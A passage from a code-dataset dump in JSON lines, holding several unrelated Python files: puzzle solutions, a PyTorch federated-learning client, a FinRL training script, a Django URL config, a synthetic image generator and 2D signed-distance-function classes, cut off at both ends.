parse_line(line)\n if missing_closing_chars:\n incomplete_scores_list.append(functools.reduce(\n lambda acc, v: 5 * acc + v,\n [incomplete_score[c] for c in missing_closing_chars],\n 0\n ))\n except Corrupted as e:\n total_error_score += error_score[e.char]\n\n\nprint(\"Part 1:\", total_error_score)\nprint(\"Part 2:\", sorted(incomplete_scores_list)[len(incomplete_scores_list) // 2])\n","repo_name":"leonardocarvalho/advent-of-code-2021","sub_path":"10/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19557051480","text":"import sys\n\ninput = sys.stdin.readline\nn = int(input())\ns = {}\nfor _ in range(n):\n a, b = input().split()\n if a not in s:\n s[a] = int(b)\n else:\n s[a] += int(b)\nfor i in sorted(s):\n print(i, s[i])\n","repo_name":"hyotaime/PS.py","sub_path":"Bronze/Bronze1/8620.py","file_name":"8620.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18308955883","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torchsummary import summary\nfrom tqdm import tqdm\nimport numpy as np\nimport os\nimport time\nimport argparse\n\n# self modules\nimport models\n\n\nclass clientInstance():\n def __init__(self, batchSize=1024, lr=1e-3, epochs=1, device=None, datasetName=None):\n self.setBatchSize(batchSize)\n self.setLearningRate(lr)\n self.setEpochs(epochs)\n self.setDevice(device)\n # set once or we can change these ??\n self.setDatasetName(datasetName)\n self.setDataLoader()\n self.setModel()\n self.setLossAndOpt(self.Net)\n \n def setBatchSize(self, batchSize):\n self.batchSize = batchSize\n \n def 
setLearningRate(self, lr):\n self.lr = lr\n \n def setEpochs(self, epochs):\n self.epochs = epochs\n \n def setDevice(self, device):\n if device is None: self.device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n else: self.device = device\n\n def setDatasetName(self, datasetName):\n self.DatasetName = datasetName\n\n def setDataLoader(self, datasetName=None):\n transform = transforms.ToTensor()\n if datasetName is None: self.DatasetName = \"lenet\"\n if datasetName is None: train_dataset = datasets.MNIST(root=\"./data\", train=True, download=True, transform=transform)\n # shuffle expects a bool; the old value 32 was merely truthy\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size = self.batchSize, shuffle=True, num_workers = 2)\n if datasetName is None: test_dataset = datasets.MNIST(root=\"./data\", train=False, download=True, transform=transform)\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size = self.batchSize, shuffle=True, num_workers = 2)\n self.train_dataset, self.test_dataset, self.train_loader, self.test_loader = train_dataset, test_dataset, train_loader, test_loader\n\n def setModel(self, model=None):\n # build the default network lazily to avoid a mutable default argument\n if model is None:\n model = models.LeNet()\n Net = model\n Net = Net.to(self.device)\n summary(Net, self.train_dataset[0][0].shape)\n self.Net = Net\n \n def setLossAndOpt(self, net):\n # Loss and Optimizer\n loss_func = nn.MSELoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=self.lr, weight_decay = 1e-8)\n self.loss_function, self.optimizer = loss_func, optimizer\n \n def setParameters(self, stateDict):\n self.Net.load_state_dict(stateDict)\n \n def getParameters(self):\n return self.Net.state_dict()\n \n # train and return parameters\n def train(self, epochs=1, delaytime=0):\n self.train_elastic(self.Net, self.train_loader, self.optimizer, self.loss_function, epochs)\n time.sleep(delaytime)\n return self.Net.state_dict()\n\n def train_elastic(self, net, train_loader, optimizer, loss_function, epochs=1):\n print(\"Client Go Training.\")\n net.train()\n for epoch in range(epochs):\n with tqdm(train_loader, unit=\"batch\") as loader_t:\n for batch_idx, (image, label) in enumerate(loader_t):\n image = image.to(self.device)\n label = nn.functional.one_hot(label, 10)\n label = label.to(torch.float)\n label = label.to(self.device)\n\n optimizer.zero_grad()\n output = net(image)\n loss = loss_function(output, label)\n loss.backward()\n optimizer.step()\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch+1,\n batch_idx * len(image),\n len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader),\n loss.item()))\n\n if (epoch+1)%20==0 or epoch==epochs-1:\n torch.save(net.state_dict(), \"./{}_{}_{}.pt\".format(os.getpid(), self.DatasetName, epoch+1)) # <------ Store Models\n \n def eval(self):\n self.eval_elastic(self.Net, self.test_loader, self.loss_function)\n \n # not loaded into self.Net\n def eval_fromStateDict(self, stateDict=None):\n if stateDict is None: model = self.Net\n else:\n model = models.LeNet()\n model.to(self.device)\n model.load_state_dict(stateDict)\n\n self.eval_elastic(model, self.test_loader, self.loss_function)\n\n def eval_elastic(self, net, test_loader, loss_function):\n print(\"Client Go Evaluating.\")\n net.eval()\n test_loss = 0\n correct = 0\n\n for (data, label) in test_loader:\n label_onehot = nn.functional.one_hot(label, 10)\n label_onehot = label_onehot.to(torch.float)\n label_onehot = label_onehot.to(self.device)\n data, label = data.to(self.device), label.to(self.device)\n\n with torch.no_grad():\n output = net(data)\n test_loss += loss_function(output, label_onehot).item()\n pred = output.data.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(label.data).cpu().sum()\n\n\n test_loss /= len(test_loader) # loss function already averages over batch size\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss,\n correct,\n len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n\ndef getArguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--url', type=str, required=False, default=\"localhost\", help='Input the server ip. e.g. 127.0.0.1')\n parser.add_argument('-p', '--port', type=int, required=False, default=8080, help='Input the server port. e.g. 8080')\n parser.add_argument('-d', '--delay', type=int, required=False, default=0, help='Input the delay time (second) of this client. e.g. 
5')\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = getArguments()\n server_url = \"http://{}:{}\".format(args.url, args.port)\n print(\"Server at {}\".format(server_url))\n # Hyper Parameters\n np.random.seed(41)\n batch_size = 1024\n lr = 1e-3\n epochs = 3\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n client1 = clientInstance(batch_size, lr, epochs, device)\n mymodel = client1.train(client1.epochs, args.delay)\n\n # evaluate current client's model\n client1.eval()\n # load parameters into model and evaluate (but not change self.Net)\n client1.eval_fromStateDict(mymodel)\n # get Parameters (that can upload for server)\n print(client1.getParameters())\n print(client1.getParameters()['conv1.weight'])","repo_name":"3chdog/AsynchronousFL-Simulator","sub_path":"client/client_instance.py","file_name":"client_instance.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"42411415220","text":"from collections import defaultdict\r\n\r\nwith open(\"day_6.in\") as puzzle_input:\r\n fish_all = puzzle_input.read().split(\",\")\r\n lantern_fish = defaultdict(int)\r\n\r\n for fish in fish_all:\r\n lantern_fish[int(fish)] = fish_all.count(fish) # each timer has its own num of occurances\r\n\r\nfor _ in range(256):\r\n new_lantern = defaultdict(int) # temp dict containing new timers\r\n\r\n for timer in lantern_fish:\r\n if timer != 0: new_lantern[timer - 1] += lantern_fish[timer] # each timer is substracted by 1 and added to the new dict\r\n else:\r\n new_lantern[6] += lantern_fish[timer] # rn, the timer of each fish is being reset\r\n new_lantern[8] = lantern_fish[timer] # rn, we add a new timer of the currently created fish\r\n\r\n lantern_fish = new_lantern\r\n\r\nprint(sum(new_lantern.values()))","repo_name":"Mike920-dev/advent-of-code-2021","sub_path":"day 6/day6_2.py","file_name":"day6_2.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"44178683259","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport datetime\nimport os\nfrom finrl import config as config_finrl\n\n#from finrl.finrl_meta.env_stock_trading.env_stocktrading import StockTradingEnv\n#from finrl.drl_agents.elegantrl.models import DRLAgent as DRLAgent_erl\n\nfrom Model.elegantrlAgent import DRLAgent as DRLAgent_erl\nfrom Model.stablebaselines3 import DRLAgent as DRLAgent_stablebaselines\nfrom Model.rllib import DRLAgent as DRLAgent_rllib\n\n\nfrom finrl.finrl_meta.preprocessor.preprocessors import FeatureEngineer, data_split\nfrom finrl.finrl_meta.data_processor import DataProcessor\nfrom Model.enviroment import StockTradingEnv\n\nfrom finrl.plot import backtest_stats, backtest_plot, get_daily_return, get_baseline\nfrom pprint import pprint\nimport sys\nsys.path.append(\"../FinRL-Library\")\nimport itertools\nimport numpy as np\nimport os\nimport gym\n\nfrom Utils.utils import read_yaml, df_to_array\n\ndef train_elegantrl(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n \n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n\n for agent_name in 
config['AGENTS']:\n\n env = StockTradingEnv\n \n train_price_array, train_tech_array, train_turbulence_array = df_to_array(train, tech_indicator_list= config_finrl.TECHNICAL_INDICATORS_LIST, if_vix= True)\n \n agent = DRLAgent_erl(env = env,\n price_array = train_price_array,\n tech_array=train_tech_array,\n turbulence_array=train_turbulence_array,\n config = config)\n model = agent.get_model(agent_name, model_kwargs = config['ERL_PARAMS'])\n\n trained_model = agent.train_model(model=model,\n cwd=config[\"TRAINED_MODEL_FOLDER\"] + scenario + '/' + agent_name,\n total_timesteps=config['BREAK_STEP'])\n\ndef train_stable_baselines(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n for agent_name in config['AGENTS']:\n\n agent = DRLAgent_stablebaselines(df = train, env = StockTradingEnv, config = config)\n model = agent.get_model(agent_name, model_kwargs = config['SB3_PARAMS'])\n\ndef train_rllib(config):\n # Load data\n processed = pd.read_csv(config['DATA_PATH'])\n processed = processed.sort_values(['date','tic'])\n \n for scenario in config['SCENARIOS']:\n begin_trade, end_trade = config['PERIODS'][scenario]\n train = data_split(processed, config['BEGIN_DAY'], begin_trade) #yyyy-mm-dd\n trade = data_split(processed, begin_trade, end_trade)\n # Process data\n\n for agent_name in config['AGENTS']:\n\n env = StockTradingEnv\n \n train_price_array, train_tech_array, train_turbulence_array = df_to_array(train, tech_indicator_list= config_finrl.TECHNICAL_INDICATORS_LIST, if_vix= True)\n \n agent = DRLAgent_rllib(env = env,\n price_array = train_price_array,\n tech_array=train_tech_array,\n turbulence_array=train_turbulence_array,\n config=config)\n model, model_config = agent.get_model(agent_name)\n\n trained_model = agent.train_model(model=model,\n model_name=agent_name,\n cwd = config[\"TRAINED_MODEL_FOLDER\"] + scenario + '/' + agent_name,\n model_config=model_config)\n\n\nif __name__ == \"__main__\":\n config_path = \"config.yaml\"\n config = read_yaml(config_path)\n if config['RLLIB'] == \"elegantrl\":\n train_elegantrl(config)\n elif config['RLLIB'] == \"stable_baselines\":\n train_stable_baselines(config)\n elif config['RLLIB'] == \"ray\":\n train_rllib(config)\n else:\n raise ValueError(\"Please choose elegantrl or stable_baselines or ray\")","repo_name":"manhkhanhad/AlgorithmicTrading","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"} +{"seq_id":"16703857248","text":"import torch\nfrom utils.tools import normalize, visualize, GaussianSmoothing\nimport os\nimport math\nfrom random import uniform\nfrom utils.Functions import GaussianSmoothing, save_tensor_image_as_png,save_tensor_image_as_png_gray\nfrom matplotlib import pyplot as plt\nfrom math import pi\nimport numpy as np\nfrom shapely.geometry.polygon import LinearRing\nos.system('mkdir warp_set')\nos.system('mkdir warp_set/diseased')\nos.system('mkdir warp_set/healthy')\n\n\nsmoothing = GaussianSmoothing(1, 3, 2, dim=2)\ninput=torch.ones(1,2,256,256)\n\n\ncount=0\nx1 = np.linspace(0, 256, 256, endpoint=False)\nx2 = np.linspace(0, 256, 256, endpoint=False)\nfor num in range(4000):\n if 
count<20: #create a dataset of 2000 images\n tensor=torch.zeros(2000,2000)\n tensor2 = torch.zeros(2000, 2000)\n K = torch.zeros((2, 256, 256))\n f1 = uniform(0.2, 0.35)\n f2 = uniform(0.35, 0.5)\n h1= uniform(0.2, 0.4); h2= uniform(0.2, 0.4)\n\n #Centers of ellipses:\n u = np.array(torch.randint(50, 200, (1,)));\n v = np.array(torch.randint(50, 200, (1,))) # Center of ellipse 1\n u2 = np.array(torch.randint(50, 200, (1,)));\n v2 = np.array(torch.randint(50, 200, (1,))) # Center of ellipse2\n dist=np.sqrt((u-u2)**2+(v-v2)**2)\n\n#-----------------------------------------------------------------------------------------------\n# add Background\n#-----------------------------------------------------------------------------------------------\n if dist>120: #the ellipses should not be too close to each other, such that they do not intersect\n\n theta = np.linspace(0, 2 * np.pi, 10000)\n for r in range(500):\n cord1 = r * np.cos(theta)+u #cord1 and cord2 are the coordinates on a circle\n cord2 = r * np.sin(theta)+v\n tensor[cord2,cord1] =math.sin(r*f1)*h1 #background in concentric waves c1\n\n tensor=tensor[:256,:256]\n\n\n for r in range(500):\n cord3 = r * np.cos(theta) + u2 #cord3 and cord4 are the coordinates on a circle\n cord4 = r * np.sin(theta) + v2\n tensor2[cord3, cord4] = math.sin(r *f2) * h2 #background in concentric waves c2\n\n tensor2=tensor2[:256,:256]\n\n tensor3=tensor+tensor2 #for the background, the concentric waves c1 and c2 are added\n tensor4=tensor3.clone()\n\n\n# -----------------------------------------------------------------------------------------------------------\n #add ellipse 1\n# -----------------------------------------------------------------------------------------------------------\n\n angle=uniform(0, 2*np.pi) #random rotation angle\n R =torch.tensor( [[np.cos(angle), -np.sin(angle)], #rotation matrix\n [np.sin(angle), np.cos(angle)]])\n\n d1 =int( np.round(np.random.normal(5, 0.7, 1))) #contour thickness g for ellipse 1\n\n mua, sigmaa =40, 1; mub, sigmab =20, 1; # mean and standard deviation of axes of e1\n a = np.random.normal(mua, sigmaa, 1) #first axis of e1\n b = np.random.normal(mub, sigmab, 1) #second axis of e1\n\n t = np.linspace(0, 2*pi, 1000)\n\n for i in range(d1):\n\n x=(a-i)*np.cos(t)\n y=(b-i)*np.sin(t)\n C=torch.tensor([x,y])\n rCoords = torch.mm(R,C)\n xr = np.array(rCoords[0,:])\n yr = np.array(rCoords[1,:])\n\n e1=np.round(xr+u); e2=np.round(yr+v)\n if e1.max()<256 and e2.max()<256:\n tensor3[e1, e2] = 1\n\n\n#--------------------------------------------------------------------------------------------------\n #add ellipse 2\n# --------------------------------------------------------------------------------------------------\n\n mua2, sigmaa2 =70, 1; mub2, sigmab2 =35,1; # mean and standard deviation of e2\n a2 = np.random.normal(mua2, sigmaa2, 1) #first axis of e2\n b2 = np.random.normal(mub2, sigmab2, 1) #first axis of e2\n angle2=uniform(0, 2*np.pi) #random rotation angle\n R =torch.tensor( [[np.cos(angle2), -np.sin(angle2)], #Rotation matrix\n [np.sin(angle2), np.cos(angle2)]])\n t = np.linspace(0, 2*pi, 1000)\n\n d2 =int( np.round(np.random.normal(5, 0.7, 1))) # contour thickness of e2\n\n for i in range(d2):\n\n x2=(a2-i)*np.cos(t)\n y2=(b2-i)*np.sin(t)\n C2=torch.tensor([x2,y2])\n rCoords = torch.mm(R,C2)\n xr2 = np.array(rCoords[0,:])\n yr2 = np.array(rCoords[1,:])\n\n\n e12=np.round(xr2+u2); e22=np.round(yr2+v2)\n if e12.max()<256 and e22.max()<256:\n tensor3[e12,e22]=1\n tensor4[e12, e22] = 
1\n\n#-----------------------------------------------------------------------------------------------\n #Check whether ellipses intersect\n# -----------------------------------------------------------------------------------------------\n\n def ellipse_polyline(ellipses, n=100):\n t = np.linspace(0, 2*np.pi, n, endpoint=False)\n st = np.sin(t)\n ct = np.cos(t)\n result = []\n for x0, y0, a, b, angle in ellipses:\n angle = np.deg2rad(angle)\n sa = np.sin(angle)\n ca = np.cos(angle)\n p = np.empty((n, 2))\n p[:, 0] = x0 + a * ca * ct - b * sa * st\n p[:, 1] = y0 + a * sa * ct + b * ca * st\n result.append(p)\n return result\n\n def intersections(a, b):\n ea = LinearRing(a)\n eb = LinearRing(b)\n mp = ea.intersection(eb)\n\n x = [p.x for p in mp]\n y = [p.y for p in mp]\n return x, y\n\n ellipses = [(u, v, a, b, angle*180/np.pi), (u2, v2, a2, b2, angle2*180/np.pi)]\n a3, b3 = ellipse_polyline(ellipses)\n x3, y3 = intersections(a3, b3)\n\n\n if len(x3)==0 and e2.max()<256 and e1.max()<256 and e12.max()<256 and e22.max()<256: #check whether the ellipses do not intersect and are inside the image\n\n T=smoothing(tensor3[None,None,:,:])\n\n #diff=T-smoothing(tensor3[None, None, :, :])\n\n K[0, :, :] = T[0,0,:,:]\n K2=K[None,...]\n X=K2[:,:1,:,:]\n count +=1\n print(count, 'count')\n plt.figure(1)\n plt.plot(T[0,0,...])\n plt.axis('off')\n\n# -----------------------------------------------------------------------------------------\n # Apply Deformation Field to generate diseased images\n # -----------------------------------------------------------------------------------------\n\n def logpdf(x, mu, sigma):\n return -0.5 * (x - mu) * (x - mu) / (sigma * sigma) - 0.5 * torch.log(2 * math.pi * sigma * sigma)\n def gaus2d(x=0, y=0, mx=0.4, my=0.4, sx=0.19, sy=0.19):\n return 1. / (2. * np.pi * sx * sy) * torch.exp(-((x - mx)**2. / (2. * sx**2.) + (y - my)**2. / (2. 
* sy**2.)))\n\n mu=torch.tensor(0)\n sigma=torch.tensor(0.1)\n\n # create meshgrid\n n =256\n\n x = torch.tensor(np.linspace(-1, 1,n)).float()\n y = torch.tensor(np.linspace(-1, 1,n)).float()\n x, y = torch.tensor(np.meshgrid(x, y))\n grid=torch.cat((x.unsqueeze(-1),y.unsqueeze(-1)), dim=2).unsqueeze(0)\n x.requires_grad = True\n y.requires_grad = True\n mv=torch.tensor(2*(u/256)-1).float()\n mu=torch.tensor(2*(v/256)-1).float()\n\n z=gaus2d(x,y, mx=mu, my=mv)\n\n\n # this line will compute the gradients\n torch.autograd.backward([z], [torch.ones(x.size()), torch.ones(y.size())])\n\n\n plt.figure(4) #Quiver plot of the deformation field\n plt.quiver(x.detach(), y.detach(), -x.grad, -y.grad, z.detach(), alpha=.9)\n plt.axis('off')\n plt.show()\n\n g1=(-x.grad)\n g2=(-y.grad)\n disp2=torch.cat((g1[None,...,None], g2[None,...,None]), 3).float()\n disp2[disp2 != disp2] = 0\n print('disp2')\n vgrid = grid + disp2 / disp2.max() * 0.1\n\n output = torch.nn.functional.grid_sample(X, vgrid)\n\n Out=torch.tensor(output[0,0,:,:].detach().numpy())\n\n diff = -X[0,0,:,:]+ Out\n\n\n X = normalize(X)\n plt.figure(1)\n plt.subplot(1, 3, 1)\n plt.imshow(X[0, 0, :, :])\n plt.title('input healthy')\n plt.axis('off')\n plt.subplot(1, 3, 2)\n output = normalize(Out)\n plt.subplot(1, 3, 2)\n plt.imshow(Out)\n plt.title('output diseased')\n plt.axis('off')\n plt.subplot(1, 3, 3)\n plt.imshow((-diff), cmap='viridis')\n plt.title('Differenz')\n plt.axis('off')\n plt.show()\n print('done')\n#------------------------------------------------------------------------------------------------\n#Save generated images\n#------------------------------------------------------------------------------------------------\n if count<2000: #save 2000 images of healthy subjects\n K[0, :, :] = X[0, 0, :, :]\n K[1, :, :] = diff #Ground Truth difference\n np.save( os.path.join('./warp_set/healthy', str(num)),K)\n\n else: #save 2000 images of diseased subjects\n K[0, :, :] = Out\n K[1, :, :] = diff #Ground Truth difference\n np.save( os.path.join('./warp_set/diseased', str(num)),K)\n","repo_name":"JuliaWolleb/DeScarGAN","sub_path":"create_synthetic_dataset.py","file_name":"create_synthetic_dataset.py","file_ext":"py","file_size_in_byte":9653,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"36"} +{"seq_id":"73192380905","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.api_overview, name='api-overview'),\n    path('fact-list/', views.fact_list, name='fact-list'),\n    path('fact-detail/<str:pk>/', views.fact_detail, name='fact-detail'),\n    path('fact-create/', views.fact_create, name='fact-create'),\n    path('fact-update/<str:pk>/', views.fact_update, name='fact-update'),\n    path('fact-delete/<str:pk>/', views.fact_delete, name='fact-delete'),\n    path('fact-random/', views.fact_random, name='fact-random')\n]\n","repo_name":"ameykasbe/fact-football","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"28069104562","text":"# Puzzle piece filling\n# https://programmers.co.kr/learn/courses/30/lessons/84021\nimport copy\n\n\ndef dfs(graph, x, y, position, n, num):\n    dx = [-1, 0, 1, 0]\n    dy = [0, 1, 0, -1]\n\n    ret = [position]\n\n    for i in range(4):\n        nx = x + dx[i]\n        ny = y + dy[i]\n\n        if 0 <= nx < n and 0 <= ny < n and graph[nx][ny] == num:\n            graph[nx][ny] = 2\n            ret = ret + dfs(graph, nx, ny, [position[0] + dx[i], position[1] + dy[i]], n, num)\n\n    return ret\n\n\ndef rotate(graph):\n    n = len(graph)\n\n    ret = [[0] * n for _ in range(n)]\n\n    for i in range(n):\n        for j in range(n):\n            ret[j][n - 1 - i] = graph[i][j]\n\n    return ret\n\n\ndef solution(game_board, table):\n    answer = 0\n    game_board_copy = copy.deepcopy(game_board)\n\n    n = len(game_board)\n    block = []\n\n    for i in range(n):\n        for j in range(n):\n            if game_board_copy[i][j] == 0:\n                game_board_copy[i][j] = 2\n                result = dfs(game_board_copy, i, j, [0, 0], n, 0)[1:]\n                block.append(result)\n\n    for r in range(4):\n        table = rotate(table)\n        table_rotate_copy = copy.deepcopy(table)\n\n        for i in range(n):\n            for j in range(n):\n                if table_rotate_copy[i][j] == 1:\n                    table_rotate_copy[i][j] = 2\n                    result = dfs(table_rotate_copy, i, j, [0, 0], n, 1)[1:]\n\n                    if result in block:\n                        block.pop(block.index(result))\n                        answer += (len(result) + 1)\n                        table = copy.deepcopy(table_rotate_copy)\n                    else:\n                        table_rotate_copy = copy.deepcopy(table)\n\n    return answer\n\n\ngame_board = [\n    [1, 1, 0, 0, 1, 0],\n    [0, 0, 1, 0, 1, 0],\n    [0, 1, 1, 0, 0, 1],\n    [1, 1, 0, 1, 1, 1],\n    [1, 0, 0, 0, 1, 0],\n    [0, 1, 1, 1, 0, 0]\n]\ntable = [\n    [1, 0, 0, 1, 1, 0],\n    [1, 0, 1, 0, 1, 0],\n    [0, 1, 1, 0, 1, 1],\n    [0, 0, 1, 0, 0, 0],\n    [1, 1, 0, 1, 1, 0],\n    [0, 1, 0, 0, 0, 0]\n]\nprint(solution(game_board, table))\n\n# Reference: https://bladejun.tistory.com/164\n# This one was really hard\n","repo_name":"hwanginbeom/algorithm_study","sub_path":"WeeklyChallenge/WeeklyChallenge03_wooseok.py","file_name":"WeeklyChallenge03_wooseok.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"4078732140","text":"\"\"\"This file contains some 2D SDFs that are used for the 2D illustrations in the paper.\"\"\"\n\nimport numpy as np\n\nimport drjit as dr\nimport mitsuba as mi\n\n\ndef detach(x, detach_variable=True):\n    return dr.detach(x) if detach_variable else x\n\n\nclass SDFBase:\n\n    def __init__(self):\n        self.step_scale = 1.0\n        self.trace_eps = 1e-4\n        self.use_weight_ad = True\n        self.warpt_normal_offset = dr.opaque(mi.Float, 0.1)\n\n\nclass Grid2d(SDFBase):\n\n    def __init__(self, data):\n        super().__init__()\n        self.shape = mi.Vector2i(np.array(data.shape))\n        self.data = mi.Float(data.ravel())\n        self.p = mi.Vector2f(0, 0)\n        self.texture = mi.Texture2f(data.shape, 1, use_accel=False)\n        self.texture.set_tensor(data[..., None])\n\n    def eval(self, x, 
detached=False):\n \"\"\"Queries a 2D image using bspline interpolation\"\"\"\n x = x - detach(self.p, detached)\n if detached:\n with dr.suspend_grad():\n with dr.resume_grad(x):\n return self.texture.eval_cubic(x, force_drjit=True)[0]\n return self.texture.eval_cubic(x, force_drjit=True)[0]\n\n def eval_grad(self, x, detached=False):\n \"\"\"Evaluates the image gradient using bspline interpolation\"\"\"\n x = x - detach(self.p, detached)\n if detached:\n with dr.suspend_grad():\n with dr.resume_grad(x):\n return self.texture.eval_cubic_grad(x)[1][0]\n\n return self.texture.eval_cubic_grad(x)[1][0]\n\n def eval_hessian(self, x, detached=False):\n \"\"\"Evaluates the image hessian using bspline interpolation\"\"\"\n x = x - dr.detach(self.p)\n assert not detached\n return self.texture.eval_cubic_hessian(x)[2][0]\n\n def traverse(self, callback):\n if self.texture is not None:\n callback.put_parameter(\"sdf.data\", self.texture.tensor(), mi.ParamFlags.Differentiable)\n else:\n callback.put_parameter(\"sdf.data\", self.data, mi.ParamFlags.Differentiable)\n\n callback.put_parameter(\"sdf.p\", self.p, mi.ParamFlags.Differentiable)\n\n def parameters_changed(self, keys):\n if self.texture is not None:\n self.texture.set_tensor(self.texture.tensor())\n\n\nclass DiskSDF(SDFBase):\n\n def __init__(self, p, r):\n super().__init__()\n self.p = p\n self.r = r\n\n def eval(self, x, detached=False):\n if detached:\n return dr.norm(x - dr.detach(self.p)) - dr.detach(self.r)\n\n return dr.norm(x - self.p) - self.r\n\n def eval_grad(self, x, detached=False):\n if detached:\n return dr.normalize(x - dr.detach(self.p))\n\n return dr.normalize(x - self.p)\n\n def eval_hessian(self, x, detached=False):\n v = x - (self.p if not detached else dr.detach(self.p))\n n = dr.norm(v)\n g = mi.Vector3f(0.0, 0.0, 0.0)\n\n g.x = 1 / n - 1 / (n * n * n) * v.x * v.x\n g.y = 1 / n - 1 / (n * n * n) * v.y * v.y\n g.z = -1 / (n * n * n) * v.x * v.y\n return mi.Matrix2f([[g.x, g.z], [g.z, g.y]])\n\n\nclass RectangleSDF(SDFBase):\n\n def __init__(self, p, extents, rotation_angle=0, offset=0.015):\n super().__init__()\n self.p = p\n self.extents = extents\n\n # TODO: Support offset and rotation\n # Rotation: rotate points before eval, rotate gradient vector\n self.rotation_angle = rotation_angle\n self.offset = offset\n\n def eval(self, x, detached=False):\n x = x - detach(self.p, detached)\n d = dr.abs(x) - detach(self.extents, detached)\n return dr.norm(dr.maximum(d, 0.0)) + dr.minimum(dr.maximum(d.x, d.y), 0.0) - self.offset\n\n def eval_grad(self, x, detached=False):\n x = x - detach(self.p, detached)\n w = dr.abs(x) - detach(self.extents, detached)\n s = mi.Vector2f(dr.select(x.x < 0.0, -1, 1), dr.select(x.y < 0.0, -1, 1))\n g = dr.maximum(w.x, w.y)\n q = dr.maximum(w, 0.0)\n l = dr.norm(q)\n inner = dr.select(w.x > w.y, mi.Vector2f(1, 0), mi.Vector2f(0, 1))\n return s * dr.select(g > 0.0, q / l, inner)\n\n def eval_hessian(self, x, detached=False):\n return mi.Matrix2f(0.0)\n\n\nclass UnionSDF(SDFBase):\n \"\"\"Allows to add to different SDFs to the same scene\"\"\"\n\n def __init__(self, sdf1, sdf2, smooth=True, k=32):\n super().__init__()\n self.sdf1 = sdf1\n self.sdf2 = sdf2\n self.smooth = smooth\n self.k = k\n\n def eval(self, x, detached=False):\n v1 = self.sdf1.eval(x, detached)\n v2 = self.sdf2.eval(x, detached)\n\n if self.smooth:\n return -dr.log(dr.exp(-self.k * v1) + dr.exp(-self.k * v2)) / self.k\n else:\n return dr.select(v1 < v2, v1, v2)\n\n def eval_grad(self, x, detached=False):\n v1 = self.sdf1.eval(x, 
detached)\n v2 = self.sdf2.eval(x, detached)\n g1 = self.sdf1.eval_grad(x, detached)\n g2 = self.sdf2.eval_grad(x, detached)\n\n if self.smooth:\n k = self.k\n x0 = dr.exp(-k * v1)\n x1 = k * x0\n x2 = dr.exp(-k * v2)\n x3 = k * x2\n x4 = 1 / (k * (x0 + x2) + 1e-7) # TODO: Is this epsilon here at the right place?\n return mi.Vector2f(-x4 * (-g1.x * x1 - g2.x * x3), -x4 * (-g1.y * x1 - g2.y * x3))\n else:\n return dr.select(v1 < v2, g1, g2)\n\n def eval_hessian(self, x, detached=False):\n v1 = self.sdf1.eval(x, detached)\n v2 = self.sdf2.eval(x, detached)\n h1 = self.sdf1.eval_hessian(x, detached)\n h2 = self.sdf2.eval_hessian(x, detached)\n h1 = mi.Vector3f(h1[0, 0], h1[1, 1], h1[0, 1])\n h2 = mi.Vector3f(h2[0, 0], h2[1, 1], h2[0, 1])\n if self.smooth:\n k = self.k\n g1 = self.sdf1.eval_grad(x, detached)\n g2 = self.sdf2.eval_grad(x, detached)\n x0 = dr.exp(-k * v1)\n x1 = k * x0\n x2 = g1.x * x1\n x3 = dr.exp(-k * v2)\n x4 = k * x3\n x5 = g2.x * x4\n x6 = k ** (-1)\n x7 = x0 + x3 + 1e-7\n x8 = x6 / x7 ** 2\n x9 = x8 * (x2 + x5)\n x10 = k ** 2\n x11 = x0 * x10\n x12 = x10 * x3\n x13 = x6 / x7\n x14 = g1.y * x1\n x15 = g2.y * x4\n x16 = -x14 - x15\n h = mi.Vector3f(-x13 * (g1.x ** 2 * x11 - h1.x * x1 + g2.x ** 2 * x12 - h2.x * x4) - x9 * (-x2 - x5),\n -x13 * (g1.y ** 2 * x11 - h1.y * x1 + g2.y ** 2 * x12 - h2.y * x4) - x16 * x8 * (x14 + x15),\n -x13 * (g1.x 